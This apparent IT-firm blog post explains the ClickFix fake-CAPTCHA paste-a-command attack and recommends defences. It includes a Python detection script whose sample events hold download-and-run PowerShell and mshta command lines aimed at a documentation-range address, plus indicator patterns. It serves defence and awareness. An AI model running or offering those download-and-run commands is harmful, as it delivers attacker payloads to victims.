There’s a new social engineering trick making the rounds, and it’s catching out even tech-savvy employees. It’s called ClickFix, and it works by convincing people to paste malicious commands into their own computers. Because the victim runs the command themselves, there is no attachment for your email filter to scan and no downloaded file for your antivirus to flag at the point of entry.
If your team uses the internet (so, everyone), this one’s worth paying attention to.
ClickFix is a social engineering technique that has been circulating since 2024 and gained real traction through late 2025. In March 2026, Microsoft and multiple security researchers linked it to active ransomware campaigns targeting businesses.
Here’s how it works in practice. An employee lands on a page that looks like a CAPTCHA check, a “your browser needs updating” warning, or a fix for a page that will not load. The page’s script has already copied a command to the clipboard. The on-screen instructions then tell the employee to press Windows+R to open the Run dialog, press Ctrl+V to paste, and press Enter. The pasted line is typically a single PowerShell or mshta command that downloads and runs the attacker’s payload.
The clever part? The malicious command is copied to the clipboard automatically, so the employee never types anything that looks like code. They just follow the on-screen instructions and paste. They think they’re completing a routine verification. In reality, they’ve just run an attacker’s command on their own machine, with their own user rights.
Traditional phishing relies on getting someone to click a dodgy link or open a suspicious attachment. Most employees have been trained to watch for those red flags. ClickFix sidesteps all of that.
It exploits trust in familiar interfaces. Everyone has clicked through a CAPTCHA before. Everyone has seen a “your browser needs updating” message. These prompts feel normal, which is exactly what makes them dangerous.
It bypasses technical defences. Because the user executes the command manually, your email security gateway never sees it, and the command itself is usually just a short downloader, so there is no malicious file for your antivirus to flag at the point of entry. The real payload only arrives once that command has run.
It does not require a sophisticated attacker. The ClickFix technique has been packaged and shared across criminal forums. Ransomware affiliates are adopting it because it works and because it is simple to deploy at scale.
This is not theoretical. In the first week of March 2026, security firm MalBeacon published research showing that a ransomware group called Velvet Tempest used ClickFix as their primary method of gaining access to a large organisation. They have been behind attacks using Ryuk, REvil, Conti, BlackCat, and LockBit. Now they are using ClickFix with fake CAPTCHA pages to deploy the Termite ransomware.
The attack played out over 12 days: Day 1, an employee encounters a malicious advert leading to a ClickFix page and pastes a command that downloads malware. Days 2 to 5, attackers quietly explore the network, map Active Directory, and harvest saved passwords from Chrome. Days 6 to 12, additional malware is deployed including the CastleRAT backdoor for persistent remote access.
You might be thinking, “We are a 30-person construction firm in Birmingham, not a Fortune 500 company.” That is exactly why you should pay attention. Ransomware groups increasingly target small and medium-sized businesses because SMBs are less likely to have dedicated security teams, ransom amounts are calibrated to what the business can afford (often 10,000 to 50,000 pounds), SMBs often have weaker backup strategies, and a small supplier’s logins and remote access into a larger customer’s systems are valuable in their own right.
For manufacturing, construction, and engineering firms in the Midlands, the operational impact goes beyond data loss. If your project management systems, CAD files, invoicing, or site communications go down, work stops. Every day of downtime costs real money.
Generic “don’t click suspicious links” training is not enough anymore. Your employees need to know that no legitimate website, CAPTCHA check or browser update will ever ask them to press Windows+R, open PowerShell or a terminal, or paste a command; that any page which does is an attack, however polished it looks; and who to report it to straight away, ideally without closing the page so IT can capture the details.
Most office workers never need PowerShell or the command prompt. Consider blocking cmd.exe and PowerShell for standard users with application control (AppLocker or Windows Defender Application Control), and removing the Run dialog for non-admin users via Group Policy (User Configuration > Administrative Templates > Start Menu and Taskbar > “Remove Run menu from Start Menu”, which sets the NoRun policy value under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer). Two caveats. PowerShell’s execution policy is not a security boundary: the lure simply passes -ExecutionPolicy Bypass on the command line, so restricting it is a nudge rather than a block. And the File Explorer address bar also accepts commands, so newer lures direct victims there instead of the Run dialog. Application control is the measure that actually stops the interpreter from running.
ClickFix attacks rely on redirecting victims to malicious domains. DNS filtering services can block known malicious domains before the connection is even made, catching a significant portion of ClickFix infrastructure before the fake CAPTCHA page ever loads. Attackers rotate domains quickly and also plant lures on compromised legitimate sites, so treat DNS filtering as a way to cut the volume rather than close the door.
Modern EDR tools can identify the suspicious command chains that ClickFix attacks use: explorer.exe (the parent of anything launched from the Run dialog) spawning powershell.exe or mshta.exe with a URL on the command line, a hidden window, an execution policy bypass, or a base64-encoded command. Turn on PowerShell script block logging as well, since it records the decoded script even when the command line is obfuscated. If you are still relying solely on traditional antivirus, it is time to upgrade. EDR solutions provide the behavioural analysis needed to catch attacks that signature-based tools miss.
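To make the command-chain idea concrete, here is an added example (not code from the original post and not any vendor’s detection rule) that triages constructed Sysmon Event ID 1 style process-creation records for the ClickFix shape. The sample events, the 203.0.113.10 address and the indicator list are assumptions made up for the example. The heuristics are the explorer.exe parent, hidden-window and execution-policy switches, Invoke-Expression, a URL on the command line, the fake CAPTCHA comment that lures append so the Run dialog shows something reassuring, and decoding of a -EncodedCommand argument so an obfuscated command is inspected too.

```python
"""Added example: triage process-creation events for ClickFix-style command chains.
Not code from the original post; the events below are constructed samples."""
import base64
import ntpath
import re

# Interpreters a ClickFix lure typically asks the victim to launch (illustrative, an assumption).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}
# The Win+R Run dialog and the File Explorer address bar both launch their command as a
# child of explorer.exe, so an interpreter whose parent is explorer.exe is the tell-tale shape.
RUN_DIALOG_PARENTS = {"explorer.exe"}

INDICATORS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "invoke-expression"),
    (re.compile(r"https?://", re.I), "remote URL in command line"),
    (re.compile(r"i am not a robot|recaptcha|verification id", re.I), "fake CAPTCHA text"),
]
# -EncodedCommand may be abbreviated to any unambiguous prefix (-e, -ec, -enc, ...).
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or '' if none."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def triage_event(event):
    """Return the reasons an event matches the ClickFix shape; an empty list means no match."""
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    if image not in INTERPRETERS or parent not in RUN_DIALOG_PARENTS:
        return []
    cmdline = event["CommandLine"]
    reasons = [label for pattern, label in INDICATORS if pattern.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        # Encoding hides the URL and iex from the raw command line; inspect the decoded script too.
        reasons.append("encoded command")
        reasons += ["decoded: " + label for pattern, label in INDICATORS if pattern.search(decoded)]
    return reasons


def triage(events):
    """Return (index, image name, reasons) for every event that matches."""
    hits = []
    for i, event in enumerate(events):
        reasons = triage_event(event)
        if reasons:
            hits.append((i, ntpath.basename(event["Image"]).lower(), reasons))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
ENCODED_SAMPLE = "iex (irm http://203.0.113.10/a)"  # constructed; 203.0.113.0/24 is a documentation range

# Constructed sample records in the shape of Sysmon Event ID 1 / Security Event 4688 fields.
SAMPLE_EVENTS = [
    # Classic lure: hidden window, policy bypass, download-and-run, fake CAPTCHA comment.
    {"ParentImage": EXPLORER, "Image": PS,
     "CommandLine": 'powershell.exe -w hidden -ep bypass -c "iex (iwr http://203.0.113.10/v.txt -UseBasicParsing)" '
                    '# I am not a robot - reCAPTCHA Verification ID: 7482'},
    # mshta variant: the HTA fetched from the URL carries the real logic.
    {"ParentImage": EXPLORER, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://203.0.113.10/captcha.hta"},
    # Encoded variant: nothing incriminating on the raw command line.
    {"ParentImage": EXPLORER, "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -e "
                    + base64.b64encode(ENCODED_SAMPLE.encode("utf-16-le")).decode()},
    # Benign: a scheduled script launched from cmd.exe, not from the Run dialog.
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    # Benign: ordinary application launched from Explorer.
    {"ParentImage": EXPLORER, "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    # Benign: a user opens an interactive shell from the Start menu.
    {"ParentImage": EXPLORER, "Image": PS, "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for index, image, reasons in triage(SAMPLE_EVENTS):
        print(f"event {index}: {image}: {', '.join(reasons)}")
```

To run this over real data, export Sysmon Event ID 1 or Security Event 4688 records (4688 only carries the command line if command-line auditing is enabled) and map the fields onto the three keys used here. After an incident, HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU on the affected machine keeps the last commands typed into the Run dialog and is worth pulling alongside the process logs.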
Many ClickFix attacks begin with malicious advertisements. Use an ad blocker across company devices, restrict browser extension installation to approved extensions only, and configure browsers to block pop-ups from unknown sites.
Even with all the right defences, no security is 100% effective. Follow the 3-2-1 rule (three copies of data, two different media types, one stored offsite). Test your backups regularly. Keep at least one backup offline or air-gapped. Know your recovery time.
ClickFix is part of a broader trend. Attackers are moving away from purely technical exploits and towards social engineering methods that trick humans into doing the technical work for them. Microsoft’s latest threat intelligence report (6 March 2026) highlighted that threat actors are now using AI to generate more convincing phishing lures and scale their social engineering campaigns.
The takeaway? Technical defences matter, but human awareness is your most important security layer. Firewalls do not help when an employee willingly pastes a command into their own machine.
At Magnetar IT, we help businesses across the Midlands, from manufacturing firms in Coventry to construction companies in Birmingham, build IT environments that can withstand modern threats. With over 10 years of experience and a 98% client satisfaction rate, we combine proactive security with responsive support (89% of issues resolved within one hour).
Whether you need a full security review, endpoint protection upgrades, or just want to know where you stand, get in touch for a no-obligation chat.
Author: Rafael Macedo